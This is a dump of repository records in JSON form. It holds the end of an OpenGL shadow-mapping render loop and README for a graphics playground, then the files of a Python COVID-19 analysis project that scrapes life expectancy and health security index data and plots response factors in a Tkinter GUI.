glfwSetFramebufferSizeCallback(window, framebuffer_size_callback);\n    glfwSetCursorPosCallback(window, mouse_callback);\n\n    // shader\n    Shader* objectShader = new Shader(objectVertexShader, objectFragmentShader);\n\n    // model\n    Model model(\"./configs/ps_meta.json\");\n\n    // make transformations\n    // projection\n    glm::mat4 view = glm::mat4(1.0f);\n    glm::mat4 projection = glm::mat4(1.0f);\n    projection = glm::perspective(glm::radians(60.0f), 500.0f / 500.0f, 0.1f, 1000.0f);\n\n    // run depth check (Z-buffer)\n    glEnable(GL_DEPTH_TEST);\n\n    // shadowing\n    unsigned int depthMapFBO;\n    glGenFramebuffers(1, &depthMapFBO);\n    const unsigned int shadowWidth = 1024, shadowHeight = 1024;\n    unsigned int depthMap;\n    glGenTextures(1, &depthMap);\n    glBindTexture(GL_TEXTURE_2D, depthMap);\n    glTexImage2D(GL_TEXTURE_2D, 0, GL_DEPTH_COMPONENT,\n                 shadowWidth, shadowHeight, 0, GL_DEPTH_COMPONENT, GL_FLOAT, NULL);\n    glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST);\n    glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST);\n    glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_BORDER);\n    glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_BORDER);\n    glBindFramebuffer(GL_FRAMEBUFFER, depthMapFBO);\n    glFramebufferTexture2D(GL_FRAMEBUFFER, GL_DEPTH_ATTACHMENT, GL_TEXTURE_2D, depthMap, 0);\n    glDrawBuffer(GL_NONE); glReadBuffer(GL_NONE);\n    glBindFramebuffer(GL_FRAMEBUFFER, 0);\n    // shadow shader\n    Shader* shadowShader = new Shader(shadowVertexShader, shadowFragmentShader);\n\n\n    // render loop\n    float time;\n    float lastFrameTime = 0.0f;\n    while (!glfwWindowShouldClose(window)) {\n\n        processInput(window);\n\n        shadowShader->use();\n        model.setShadow(shadowShader);\n        glViewport(0, 0, shadowWidth, shadowHeight);\n        glBindFramebuffer(GL_FRAMEBUFFER, depthMapFBO);\n        glClear(GL_DEPTH_BUFFER_BIT);\n        model.draw(shadowShader);\n\n        glBindFramebuffer(GL_FRAMEBUFFER, 0);\n        glViewport(0, 0, width, height);\n        glClearColor(0.55f, 0.77f, 0.85f, 1.0f);\n        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);\n\n        // update frame timing\n        time = glfwGetTime();\n        deltaTime = time - lastFrameTime;\n        lastFrameTime = time;\n\n        // render objects with objectShader\n        objectShader->use();\n        objectShader->setUniform(\"projection\", projection);\n        objectShader->setUniform(\"cameraPosition\", cameraPos);\n        model.setEnvironment(objectShader);\n        objectShader->setUniform(\"shadowMap\", 0);\n\n        glActiveTexture(GL_TEXTURE0);\n        glBindTexture(GL_TEXTURE_2D, depthMap);\n        \n        // override camera settings\n        view = glm::lookAt(cameraPos, cameraPos + cameraFront, cameraUp);\n        objectShader->setUniform(\"view\", view);\n        // draw\n        model.draw(objectShader);\n\n        glfwSwapBuffers(window);\n        glfwPollEvents();\n    }\n\n    glfwTerminate();\n    return 0;\n}\n" }, { "alpha_fraction": 0.6948022842407227, "alphanum_fraction": 0.7130164504051208, "avg_line_length": 31.22857093811035, "blob_id": "29bbcc546fd46e1e3b849d68727acfa550c89bf7", "content_id": "8afacc7e60f9424d1392955eeda5825f337ca813", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2253, "license_type": "permissive", "max_line_length": 211, "num_lines": 69, "path": "/README.md", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "\n# OBJET: A Graphics Playground for Computer Vision\nOBJET is a graphical environment, developed in OpenGL and accessible from Python, built to cater to the data needs of anyone conducting research on computer vision in simulated 3D scenes. 
\n\n<img align=\"right\" width=\"200\" height=\"200\" src=\"./resources/logo/OBJET.png\">\nLoad your own objects in a room, take a snapshot of the viewport from the viewpoint of the customizable camera, and load it into Python. \nThis gives you the ability to create data on the fly, in your Python data loader. \nCheck out the footnoted video by Ali Eslami et al. to see such an environment in practice.\n\n## Synopsis\n\n### Dependencies\nOn Arch Linux:\n```\nsudo pacman -S rapidjson mesa glfw-x11 glew glm assimp swig freeimage\n```\n\n### Usage\n\n#### Walk Around\n```sh \nmake \n./main\n```\n\n#### Build and Install for Python\n```sh \nmake python -j4\npip install .\n```\n\n#### get_image\n<img align=\"right\" width=\"150\" height=\"150\" src=\"./resources/images/ps_meta.png\" title=\"ps_meta room\"> <img align=\"right\" width=\"150\" height=\"150\" src=\"./resources/images/meta.png\" title=\"meta room\">\n```python\n# for now\nfrom pyobjet import Objet\nobjet = Objet(\"./configs/ps_meta.json\")\nobjet.set_object_position(\"cross\", [3., 0., 3.])\nobjet.draw()\nimage = objet.get_image()\nobjet.to_image(\"./output.png\")\n```\n\n#### get_depth_map\n<img align=\"right\" width=\"150\" height=\"150\" src=\"./resources/images/depth_ps_meta.png\" title=\"ps_meta room\"> <img align=\"right\" width=\"150\" height=\"150\" src=\"./resources/images/depth_meta.png\" title=\"meta room\">\n```python\n# for now\ndepth_map = objet.get_depth_map()\n# for demonstration\nfrom PIL import Image\nimg = Image.fromarray(depth_map * 10)\nimg.show()\n```\n\n\n\n##### What does \"OBJET\" mean?\nObjet is French for \"object.\"\n\n##### Are you French?\nNo, I used Google Translate.\n\n##### Why C++/SWIG and not PyOpenGL?\n* PyOpenGL is overkill by nature. \n* Might be interested in using this library in other languages.\n* Might be interested in linking the data directly to CUDA later on.\n* Data Scientists should learn to install dependencies on their own — life ain't always `pip install package`.\n* This work was done over a COVID-19 quarantine; I had to kill some time.\n\n###### Ali Eslami et al.: www.youtube.com/watch?v=G-kWNQJ4idw\n" } ]
23
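The OBJET README above pitches on-the-fly data generation inside a Python data loader. Below is a minimal sketch of what that loop could look like, using only the pyobjet calls demonstrated in the README (`Objet`, `set_object_position`, `draw`, `get_image`, `get_depth_map`); the generator wrapper, the randomization ranges, and the reuse of the sample config path and the "cross" object name are illustrative assumptions, not part of the library:

```python
import random

from pyobjet import Objet


def sample_frames(n, config="./configs/ps_meta.json"):
    """Yield n (image, depth_map) pairs with the 'cross' object moved randomly.

    A sketch only: config path, object name, and ranges are assumptions
    borrowed from the README's example, not a documented API contract.
    """
    objet = Objet(config)
    for _ in range(n):
        # place the object at a random spot on the floor plane
        x, z = random.uniform(-3.0, 3.0), random.uniform(-3.0, 3.0)
        objet.set_object_position("cross", [x, 0.0, z])
        objet.draw()  # render before reading pixels back, as in the README
        yield objet.get_image(), objet.get_depth_map()


# e.g. feed the pairs straight into a vision dataloader
for image, depth in sample_frames(4):
    pass  # train / augment / save here
```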
AnshBhatti/COVID-19_Data_Analysis
https://github.com/AnshBhatti/COVID-19_Data_Analysis
ca7cfe2a886545d822dbb5f79b44305d6409d316
734d843a985baa958a0897b321be7f76a2924d9c
dbc0a671bde2c28a5a3457a8a786b1752a56d1bc
refs/heads/master
2022-11-28T01:50:40.483803
2020-08-05T21:06:40
2020-08-05T21:06:40
259,742,263
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.6622222065925598, "alphanum_fraction": 0.6733333468437195, "avg_line_length": 32.61538314819336, "blob_id": "74a7439e027c0b5f102c78bb76de30638029c488", "content_id": "3228f9392020a2bea4e6c6887a894b4f4be52d29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 450, "license_type": "no_license", "max_line_length": 78, "num_lines": 13, "path": "/life_exp.py", "repo_name": "AnshBhatti/COVID-19_Data_Analysis", "src_encoding": "UTF-8", "text": "from selenium import webdriver\r\nimport pandas as pd\r\ndef get_exp():\r\n browser=webdriver.Chrome(\"chromedriver.exe\")\r\n browser.implicitly_wait(10)\r\n browser.get(\"https://www.worldometers.info/demographics/life-expectancy/\")\r\n df=pd.read_html(browser.page_source)[0]\r\n del df[\"#\"]\r\n del df[\"Females Life Expectancy\"]\r\n del df[\"Males Life Expectancy\"]\r\n df.drop(29)\r\n df.to_csv(\"life_exp.csv\",index=False)\r\n browser.quit()\r\n" }, { "alpha_fraction": 0.797764241695404, "alphanum_fraction": 0.8028455376625061, "avg_line_length": 41.78260803222656, "blob_id": "38b7a942fc63937c206c706c339f6b1716fcedff", "content_id": "cb4c756a1bfd6a088bbffcd3af451e9b8075ffeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 984, "license_type": "no_license", "max_line_length": 75, "num_lines": 23, "path": "/DESCRIPTION.txt", "repo_name": "AnshBhatti/COVID-19_Data_Analysis", "src_encoding": "UTF-8", "text": "PROGRAM: main.py\n\nCREATOR: Ansh Bhatti\n\nPURPOSE: In this time of heightened global crisis, everybody wants to know \nwhat exactly is happening. This data analysis serves purposes of:\n- Providing up-to-date statistics regarding COVID-19 throughout the world\n- Generating visualizations of the statistics of [at most 5 at a given \ntime] countries\n- Providing the \"Response Factor,\" which is essentially the number of\ndays it took for a country to reach its maximum number of active cases.\nAs of now, the Response Factor will not be accurate as many countries are\nyet to reach their maximum.\n- Finding the relationship between the Global Health Security Index and \nthe Response Factor in a scatter plot\n- Finding the relationship between Life Expectancy and\nthe Response Factor in a scatter plot\n\nCREDITS:\n- Johns Hopkins Whiting School of Engineering for their\nCOVID-19 dataset on Github\n- Worldometers for their life expectancy chart\n- GHS Index for their Global Health Security Index chart\n" }, { "alpha_fraction": 0.5311750769615173, "alphanum_fraction": 0.5311750769615173, "avg_line_length": 22.828571319580078, "blob_id": "ce0421057a9bac8d5aed8c59be52f875f9b3c1ad", "content_id": "c3895281a7a90041c19fce01d30955f10e6df631", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 834, "license_type": "no_license", "max_line_length": 69, "num_lines": 35, "path": "/setup_data.py", "repo_name": "AnshBhatti/COVID-19_Data_Analysis", "src_encoding": "UTF-8", "text": "def setup_data(data):\n #print(data.head())\n data[\"Active\"]=data[\"Confirmed\"]-data[\"Recovered\"]-data[\"Deaths\"]\n try:\n del data[\"Province/State\"]\n except KeyError:\n del data[\"Province_State\"]\n try:\n del data[\"Last_Update\"]\n except KeyError:\n try:\n del data[\"Last Update\"]\n except KeyError:\n s=\"l\"\n try:\n del data[\"Long_\"]\n del data[\"Lat\"]\n except KeyError:\n s=\"l\"\n try:\n del data[\"FIPS\"]\n except KeyError:\n s=\"l\"\n try:\n del data[\"Combined_Key\"]\n 
except KeyError:\n        s=\"l\"\n    #del data[\"Confirmed\"]\n    #del data[\"Deaths\"]\n    #del data[\"Recovered\"]\n    try:\n        data=data.groupby(\"Country_Region\").sum()\n    except KeyError:\n        data=data.groupby(\"Country/Region\").sum()\n    return data\n" }, { "alpha_fraction": 0.7604290843009949, "alphanum_fraction": 0.781883180141449, "avg_line_length": 28.964284896850586, "blob_id": "f070eaffb4a9a4ac92ed3b4f9c9ff7ad15cdd794", "content_id": "3e9fe92dd5aeca4e9e60556450b4176b302ef6d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 839, "license_type": "no_license", "max_line_length": 151, "num_lines": 28, "path": "/README.md", "repo_name": "AnshBhatti/COVID-19_Data_Analysis", "src_encoding": "UTF-8", "text": "# COVID-19_Data_Analysis\nGet updates, analyze countries' data, analyze their response relative to their recovery time, analyze the Global Health Security Index and life expectancy.\n\nInstructions:\n1) Execute main.py (do not manipulate any of the files)\n2) Wait for data updates (if needed)\n3) In the GUI that opens, click on 1 of the 4 boxes for its respective functionality\n\nCurrent updates:\n- Project is done! I open myself to feedback and revisions. \n\nPackages used:\n- Openpyxl\n- Pandas\n- Matplotlib\n- Numpy\n- Lxml\n- Tkinter\n- Datetime and time\n\nLanguage: Python 3\n\nCredits:\n- Johns Hopkins Whiting School of Engineering for their COVID-19 dataset on Github\n- Worldometers for their life expectancy chart\n- GHS Index for their Global Health Security Index chart\n\nAnalysis: https://medium.com/@anshvbhatti/covid-19-analysis-lets-rewind-f1613afebe97\n" }, { "alpha_fraction": 0.6617100238800049, "alphanum_fraction": 0.6765799522399902, "avg_line_length": 38.349998474121094, "blob_id": "fde02f8fcce61bed9f033ca596c6535f5d348613", "content_id": "fc1c90436f81d159baf5f922f566a0b87c103438", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 807, "license_type": "no_license", "max_line_length": 82, "num_lines": 20, "path": "/ghs.py", "repo_name": "AnshBhatti/COVID-19_Data_Analysis", "src_encoding": "UTF-8", "text": "from selenium import webdriver\r\nimport pandas as pd\r\ndef acquire_ghs():\r\n    browser=webdriver.Chrome(\"chromedriver.exe\")\r\n    browser.implicitly_wait(10)\r\n    browser.get(\"https://www.ghsindex.org/\")\r\n    table=browser.find_element_by_class_name(\"countryTable\")\r\n    btn=browser.find_element_by_xpath(\"//button[@class='seeCompleteList button']\")\r\n    btn.click()\r\n    content=pd.read_html(browser.page_source)[0]\r\n    content=content[[content.columns[1],content.columns[2]]]\r\n    countries=content[\"Country\"]\r\n    scores=content[content.columns[1]]\r\n    for a in range(len(countries)):\r\n        countries[a]=countries[a][9:]\r\n        scores[a]=float(scores[a][13:17])\r\n    content[\"Country\"]=countries\r\n    content[content.columns[1]]=scores\r\n    content.to_csv(\"ghs.csv\",index=False)\r\n    browser.quit()\r\n" }, { "alpha_fraction": 0.6338376998901367, "alphanum_fraction": 0.6774621605873108, "avg_line_length": 51.440834045410156, "blob_id": "07a804d80339b08cd23da8858981435ac12141bb", "content_id": "27568b557d9db5709a996ecc5a9ed32899526e8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22609, "license_type": "no_license", "max_line_length": 847, "num_lines": 431, "path": "/main.py", "repo_name": "AnshBhatti/COVID-19_Data_Analysis", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nfrom tkinter import 
*\nfrom datetime import date, timedelta, datetime\nimport os.path\nfrom generate_excel import generate, update\nfrom ghs import acquire_ghs\nfrom time import sleep\nimport matplotlib.pyplot as plt\nimport tkinter.font as tkFont\nfrom PIL import ImageTk,Image\nfrom time import sleep\nfrom life_exp import get_exp\nglobal letters\nglobal lis\nglobal opts\nglobal colors\nglobal m\nglobal b\ncolors=[\"red\",\"green\",\"blue\",\"brown\",\"yellow\"]\nletters=[\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"M\",\"N\",\"O\",\"P\",\"Q\",\"R\",\"S1\",\"S2\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"Z\"]\nlis=[-1,-1,-1,-1,-1]\ntk=Tk()\nhelv36 = tkFont.Font(family=\"Comfortaa\",size=14)\ntk.title(\"COVID-19 Analysis\")\ncanvas=Canvas(bg=\"#fce8b1\",width=1000,height=750)\ncanvas.pack()\ndef call(event):\n print(str(event.x)+' '+str(event.y))\ncanvas.bind(\"<Button-1>\",call)\n\nBASE_URL=\"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_daily_reports/\"\ndef updates_by_country(event,r=1):\n canvas.delete('all')\n canvas.create_rectangle(20,20,980,730,fill=\"white\",outline=\"white\")\n btn=Button(text='Return',command=setup_GUI,relief=FLAT,bg=\"cyan\")\n canvas.create_window(930,120,window=btn)\n canvas.create_text(500,50,font=\"Courier 20\",text=\"Covid-19 Cases and Response Factors\",justify=CENTER)\n writ=canvas.create_rectangle(50,100,150,140,fill=\"#dbddff\",outline=\"#dbddff\")\n writ1=canvas.create_text(100,120,text=\"Written\",font=helv36)\n grph=canvas.create_rectangle(150,100,250,140,fill=\"#ffe3cf\",outline=\"#ffe3cf\")\n grph1=canvas.create_text(200,120,text=\"Graph\",font=helv36)\n canvas.tag_bind(writ,\"<Button-1>\",wri)\n canvas.tag_bind(writ1,\"<Button-1>\",wri)\n canvas.tag_bind(grph,\"<Button-1>\",gr)\n canvas.tag_bind(grph1,\"<Button-1>\",gr)\n if r==1:\n written('A')\n else:\n graph()\ndef wri(event):\n updates_by_country(event,r=1)\ndef written(let):\n canvas.create_rectangle(50,140,950,710,fill=\"#dbddff\",outline=\"#dbddff\")\n canvas.create_text(70,160,text=\"Country\",font=\"Times 14\",anchor=W)\n canvas.create_text(200,160,text=\"Confirmed\",font=\"Times 14\",anchor=W)\n canvas.create_text(300,160,text=\"Recovered\",font=\"Times 14\",anchor=W)\n canvas.create_text(400,160,text=\"Deaths\",font=\"Times 14\",anchor=W)\n canvas.create_text(500,160,text=\"Active\",font=\"Times 14\",anchor=W)\n canvas.create_text(600,160,text=\"Response Factor\",font=\"Times 14\",anchor=W)\n canvas.create_text(860,180,text=\"Browse countries by letter:\",font=\"Times 14\",width=150)\n act=active.tail(1)\n con=confirmed.tail(1)\n dea=deaths.tail(1)\n rec=recovered.tail(1)\n y=190\n for a in range(len(countries)):\n if countries[a][0].upper()==let or let==\"S1\" and countries[a][0].upper()=='S' and countries[a][1].lower()<'o' or let==\"S2\" and countries[a][0].upper()=='S' and countries[a][1].lower()>='o':\n canvas.create_text(70,y,text=countries[a],font=\"Times 12\",anchor=W,width=130)\n canvas.create_text(200,y,text=int(con[countries[a]]),font=\"Times 12\",anchor=W)\n canvas.create_text(300,y,text=int(rec[countries[a]]),font=\"Times 12\",anchor=W)\n canvas.create_text(400,y,text=int(dea[countries[a]]),font=\"Times 12\",anchor=W)\n canvas.create_text(500,y,text=int(act[countries[a]]),font=\"Times 12\",anchor=W)\n if countries[a] in list(country_rf.index):\n canvas.create_text(600,y,text=country_rf[\"rf\"][countries[a]],font=\"Times 12\",anchor=W)\n else:\n canvas.create_text(600,y,text=\"N/A\",font=\"Times 12\",anchor=W)\n y+=30\n 
var=StringVar(tk)\n var.set(let)\n w=OptionMenu(tk,var,*letters,command=written)\n canvas.create_window(900,200,window=w)\ndef gr(event):\n updates_by_country(0,r=0)\ndef graph():\n canvas.create_rectangle(50,140,950,710,fill=\"#ffe3cf\",outline=\"#ffe3cf\")\n canvas.create_text(500,160,text=\"Select at most 5 countries you want to compare (leave dropdowns empty as needed):\",font=\"Times 14\")\n q=StringVar(tk)\n q1=StringVar(tk)\n q2=StringVar(tk)\n q3=StringVar(tk)\n q4=StringVar(tk)\n q.set(\"Select a letter:\")\n q1.set(\"Select a letter:\")\n q2.set(\"Select a letter:\")\n q3.set(\"Select a letter:\")\n q4.set(\"Select a letter:\")\n p1=OptionMenu(tk,q,*letters,command=p11)\n p2=OptionMenu(tk,q1,*letters,command=p22)\n p3=OptionMenu(tk,q2,*letters,command=p33)\n p4=OptionMenu(tk,q3,*letters,command=p44)\n p5=OptionMenu(tk,q4,*letters,command=p55)\n canvas.create_window(140,195,window=p1)\n canvas.create_window(320,195,window=p2)\n canvas.create_window(500,195,window=p3)\n canvas.create_window(680,195,window=p4)\n canvas.create_window(860,195,window=p5)\n global v\n global v1\n global v2\n global v3\n global v4\n v=StringVar(tk)\n v1=StringVar(tk)\n v2=StringVar(tk)\n v3=StringVar(tk)\n v4=StringVar(tk)\n v.set(\"Select a country:\")\n v1.set(\"Select a country:\")\n v2.set(\"Select a country:\")\n v3.set(\"Select a country:\")\n v4.set(\"Select a country:\")\ndef p11(val):\n cont=[]\n for a in range(len(countries)):\n if countries[a][0].upper()==val or val==\"S1\" and countries[a][0].upper()=='S' and countries[a][1].lower()<'o' or val==\"S2\" and countries[a][0].upper()=='S' and countries[a][1].lower()>='o':\n cont.append(countries[a])\n o1=OptionMenu(tk,v,*cont,command=add)\n canvas.create_window(140,240,window=o1)\ndef p22(val):\n cont=[]\n for a in range(len(countries)):\n if countries[a][0].upper()==val or val==\"S1\" and countries[a][0].upper()=='S' and countries[a][1].lower()<'o' or val==\"S2\" and countries[a][0].upper()=='S' and countries[a][1].lower()>='o':\n cont.append(countries[a])\n o2=OptionMenu(tk,v1,*cont,command=add)\n canvas.create_window(320,240,window=o2)\ndef p33(val):\n cont=[]\n for a in range(len(countries)):\n if countries[a][0].upper()==val or val==\"S1\" and countries[a][0].upper()=='S' and countries[a][1].lower()<'o' or val==\"S2\" and countries[a][0].upper()=='S' and countries[a][1].lower()>='o':\n cont.append(countries[a])\n o3=OptionMenu(tk,v2,*cont,command=add)\n canvas.create_window(500,240,window=o3)\ndef p44(val):\n cont=[]\n for a in range(len(countries)):\n if countries[a][0].upper()==val or val==\"S1\" and countries[a][0].upper()=='S' and countries[a][1].lower()<'o' or val==\"S2\" and countries[a][0].upper()=='S' and countries[a][1].lower()>='o':\n cont.append(countries[a])\n o4=OptionMenu(tk,v3,*cont,command=add)\n canvas.create_window(680,240,window=o4)\ndef p55(val):\n cont=[]\n for a in range(len(countries)):\n if countries[a][0].upper()==val or val==\"S1\" and countries[a][0].upper()=='S' and countries[a][1].lower()<'o' or val==\"S2\" and countries[a][0].upper()=='S' and countries[a][1].lower()>='o':\n cont.append(countries[a])\n o5=OptionMenu(tk,v4,*cont,command=add)\n canvas.create_window(860,240,window=o5)\ndef add(val):\n global li\n l1=[v.get(),v1.get(),v2.get(),v3.get(),v4.get()]\n li=[]\n for each in l1:\n if each!=\"Select a country:\":\n li.append(each)\n if len(li)==1:\n canvas.create_text(70,320,width=200,anchor=W,justify=LEFT,text=\"Click on any of the following after you select at most 5 countries:\",font=\"Times 14\")\n 
bt1=Button(text=\"Confirmed\",width=10,relief=FLAT,font=\"Times 14\",bg=\"#31007a\",fg=\"white\",command=confirm)\n bt2=Button(text=\"Active\",width=10,relief=FLAT,font=\"Times 14\",bg=\"#31007a\",fg=\"white\",command=activ)\n bt3=Button(text=\"Recovered\",width=10,relief=FLAT,font=\"Times 14\",bg=\"#31007a\",fg=\"white\",command=recover)\n bt4=Button(text=\"Deaths\",width=10,relief=FLAT,font=\"Times 14\",bg=\"#31007a\",fg=\"white\",command=show_death)\n canvas.create_window(150,400,window=bt1)\n canvas.create_window(150,470,window=bt2)\n canvas.create_window(150,540,window=bt3)\n canvas.create_window(150,610,window=bt4)\n print(li)\ndef confirm():\n z=plt.cla()\n z=plt.xlabel(\"Date\")\n z=plt.ylabel(\"Confirmed cases\")\n va=max(list(confirmed.index))+1\n #z=plt.yticks(np.arange(0,6000000,50000))\n z=plt.xticks(np.arange(0,va,int(va/4)))\n confi=[list(confirmed[each]) for each in li]\n dates=active[\"Date\"]\n for e in range(len(li)):\n z=plt.plot(dates,confi[e],color=colors[e],label=li[e])\n plt.legend()\n plt.savefig('plot.png',bbox_inches='tight')\n put_img('plot.png',620,485)\ndef put_img(fil,x,y):\n img=PhotoImage(file=fil)\n label=Label(image=img)\n label.image=img\n label.pack()\n canvas.create_window(x,y,window=label)\ndef activ():\n z=plt.cla()\n z=plt.xlabel(\"Date\")\n z=plt.ylabel(\"Active cases\")\n va=max(list(active.index))+1\n #z=plt.yticks(np.arange(0,6000000,50000))\n z=plt.xticks(np.arange(0,va,int(va/4)))\n confi=[list(active[each]) for each in li]\n dates=active[\"Date\"]\n for e in range(len(li)):\n z=plt.plot(dates,confi[e],color=colors[e],label=li[e])\n plt.legend()\n plt.savefig('plot.png',bbox_inches='tight')\n put_img('plot.png',620,485)\ndef recover():\n z=plt.cla()\n z=plt.xlabel(\"Date\")\n z=plt.ylabel(\"# of people recovered\")\n va=max(list(recovered.index))+1\n #z=plt.yticks(np.arange(0,6000000,50000))\n z=plt.xticks(np.arange(0,va,int(va/4)))\n confi=[list(recovered[each]) for each in li]\n dates=active[\"Date\"]\n for e in range(len(li)):\n z=plt.plot(dates,confi[e],color=colors[e],label=li[e])\n plt.legend()\n plt.savefig('plot.png',bbox_inches='tight')\n put_img('plot.png',620,485)\ndef show_death():\n z=plt.cla()\n z=plt.xlabel(\"Date\")\n z=plt.ylabel(\"Confirmed cases\")\n va=max(list(deaths.index))+1\n #z=plt.yticks(np.arange(0,6000000,50000))\n z=plt.xticks(np.arange(0,va,int(va/4)))\n confi=[list(deaths[each]) for each in li]\n dates=active[\"Date\"]\n for e in range(len(li)):\n z=plt.plot(dates,confi[e],color=colors[e],label=li[e])\n plt.legend()\n plt.savefig('plot.png',bbox_inches='tight')\n put_img('plot.png',620,485)\ndef rf_by_country(event):\n canvas.create_rectangle(20,20,980,730,fill=\"white\",outline=\"white\")\n btn=Button(text='Return',command=setup_GUI,relief=FLAT,bg=\"cyan\")\n canvas.create_window(950,120,window=btn)\n canvas.create_text(500,50,font=\"Courier 20\",text=\"Covid-19 Response Factor v. Confirmed Cases\")\n canvas.create_rectangle(50,140,950,710,fill=\"#ffe3cf\",outline=\"#ffe3cf\")\n canvas.create_text(60,160,text=\"Analysis:\",font=\"Times 20\",anchor=W,justify=LEFT)\n con=confirmed.tail(1)\n z=plt.cla()\n z=plt.xlabel(\"# of confirmed cases to date\")\n z=plt.ylabel(\"Response factor\")\n x_data=np.array([int(con[each]) for each in countries])\n y_data=np.array(list(country_rf[\"rf\"]))\n m,b=np.polyfit(x_data,y_data,1)\n print(y_data)\n z=plt.title(\"Response Factor vs. 
Cases\")\n plt.scatter(x_data,y_data,color=\"black\")\n plt.plot(x_data,m*x_data+b,color=\"black\")\n plt.savefig(\"plot1.png\",bbox_inches='tight')\n put_img('plot1.png',650,380)\n canvas.create_text(60,190,width=300,justify=LEFT,anchor=NW,font=\"Times 14\",text='''Analyzing the dependance of the Response Factor of each country over its current # of confirmed cases is important in order to understand how much the # of confirmed cases affected the time it will take for a country to reach its peak in the number of active cases. This relationship is all but obvious. Even though in general, there is a positive correlation as expected, there are a lot of outliers, i.e. a lot of countries that either have a huge response factor and low number of confirmed cases or a low response factor and a high number of confirmed cases. As of now, issues with this analysis include the fact that the number of active cases in some countries are still increasing, so the response factor of many countries is''')\n canvas.create_text(60,610,width=900,justify=LEFT,anchor=NW,font=\"Times 14\",text='''still increasing. Another issue is squeezed visualization of countries' # of confirmed cases in the scatter plot due to outliers in the # of confirmed cases. The correlation value tells us that, in general, for a +1 increase in response factor, nearly '''+str(int(1/m))+''' additional cases are needed.''')\ndef rf_ghs(event):\n canvas.create_rectangle(20,20,980,730,fill=\"white\",outline=\"white\")\n btn=Button(text='Return',command=setup_GUI,relief=FLAT,bg=\"cyan\")\n canvas.create_window(950,120,window=btn)\n canvas.create_text(500,50,font=\"Courier 20\",text=\"Response Factor v. Global Health Security Index\")\n canvas.create_rectangle(50,140,950,720,fill=\"#ffe3cf\",outline=\"#ffe3cf\")\n canvas.create_text(60,160,text=\"Analysis:\",font=\"Times 20\",anchor=W,justify=LEFT)\n x_data=[]\n y_data=[]\n for each in list(ghs.index):\n if each in countries:\n x_data.append(ghs[ghs.columns[0]][each])\n y_data.append(country_rf[\"rf\"][each])\n x_data=np.array(x_data)\n y_data=np.array(y_data)\n plt.cla()\n plt.xlabel(\"Global Health Security Index\")\n plt.ylabel(\"Response Factor\")\n plt.title(\"Response Factor v. GHS Index\")\n m,b=np.polyfit(x_data,y_data,1)\n plt.scatter(x_data,y_data,color=\"black\")\n plt.plot(x_data,m*x_data+b,color=\"black\")\n plt.savefig(\"plot2.png\",bbox_inches='tight')\n put_img(\"plot2.png\",650,380)\n canvas.create_text(60,190,width=300,justify=LEFT,anchor=NW,font=\"Times 14\",text='''Many consider Global Health Security Index to be an important factor that determined the fate of a country infected with the coronavirus. It is a score of how prepared a country is to face a pandemic such as the coronavirus. For this reason, it is important to compare GHS index with what we define as response factor, which is the number of days it took for a country to reach its peak in the number of active cases. Thus, one would expect a negative correlation between response factor and the GHS index, as they would expect a better (lower) response factor with a better (higher) GHS index. However, the scatter plot and linear regression indicate a slightly positive correlation, showing that an increase in the GHS''')\n canvas.create_text(60,610,width=900,justify=LEFT,anchor=NW,font=\"Times 14\",text='''index will result in an increase in the response factor. The low magnitude of correlation also indicates that response factor and the GHS index are largely unrelated to each other. 
Both developed and developing countries suffered different fates, which mostly did not depend on how developed they were, as indicated by this correlation. Many developed countries rank near the top in the number of cases due to other factors such as tourism and mass transportation. Thus, the GHS index is a good measure of preparedness, but not of the reality.''')\n    #plt.show()\ndef acr_rf(event):\n    canvas.create_rectangle(20,20,980,730,fill=\"white\",outline=\"white\")\n    btn=Button(text='Return',command=setup_GUI,relief=FLAT,bg=\"cyan\")\n    canvas.create_window(950,120,window=btn)\n    canvas.create_text(500,50,font=\"Courier 20\",text=\"Response Factor v. Life Expectancy\")\n    canvas.create_rectangle(50,140,950,720,fill=\"#ffe3cf\",outline=\"#ffe3cf\")\n    canvas.create_text(60,160,text=\"Analysis:\",font=\"Times 20\",anchor=W,justify=LEFT)\n    x_data=[]\n    y_data=[]\n    for each in countries:\n        if each in list(life.index):\n            x_data.append(life[life.columns[0]][each])\n            y_data.append(country_rf[\"rf\"][each])\n    x_data=np.array(x_data)\n    y_data=np.array(y_data)\n    m,b=np.polyfit(x_data,y_data,1)\n    plt.cla()\n    plt.ylabel(\"Response Factor\")\n    plt.xlabel(\"Life Expectancy (in years)\")\n    plt.title(\"Response Factor v. Life Expectancy\")\n    plt.scatter(x_data,y_data,color=\"black\")\n    plt.plot(x_data,m*x_data+b,color=\"black\")\n    plt.savefig(\"plot3.png\",bbox_inches=\"tight\")\n    put_img(\"plot3.png\",650,380)\n    canvas.create_text(60,190,width=300,justify=LEFT,anchor=NW,font=\"Times 14\",text='''The life expectancy of a country is the average number of years that a person is expected to live in that country. Higher life expectancy is generally associated with nations more on the developed side due to better health infrastructure and promotion of well-being in those countries. For this reason, it is essential to analyze whether life expectancy has any impact on the response factor of a country (the number of days it took for a country to reach its peak in active cases). Many would assume a negative correlation, in which a better life expectancy (higher) would result in a better response factor (lower). It turns out that the correlation is indeed negative. However, the magnitude of the correlation is low enough to deduce that life''')\n    